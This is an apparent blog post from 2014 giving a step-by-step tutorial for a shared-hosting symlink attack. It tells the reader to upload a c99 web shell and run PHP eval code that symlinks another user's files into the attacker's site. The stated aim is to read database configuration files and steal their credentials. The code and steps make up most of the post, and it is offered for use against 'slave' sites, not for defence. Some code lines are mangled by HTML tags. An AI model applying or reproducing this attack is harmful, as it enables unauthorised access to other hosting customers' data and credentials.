\
Powered by Blogger.

Blog Archive

Tags:

Private Symlink(PHP)

By admin → Wednesday, January 22, 2014


First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host


Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell_Silic0n.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ==============================​==
http://www.yoursitename.com/shell_Silic0n.php
================================================== ==============================​==


/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
".file_get_contents("http://" .  $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" .  "tarea>";<br />@unlink($flib);<br /><br />!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net </span>
echo "

Post Tags:

Ichsan Bahri

I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.

Website: http://sagoe.net/
Posted by admin at 4:23 PM
Labels:

No Comment to " Private Symlink(PHP) "

Subscribe to: Post Comments ( Atom )